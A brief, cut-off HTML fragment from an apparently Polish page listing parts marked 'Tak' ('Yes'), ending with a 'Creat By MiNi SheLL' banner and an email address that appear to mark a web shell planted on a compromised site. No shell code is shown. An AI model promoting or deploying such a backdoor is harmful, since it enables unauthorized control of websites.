: <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com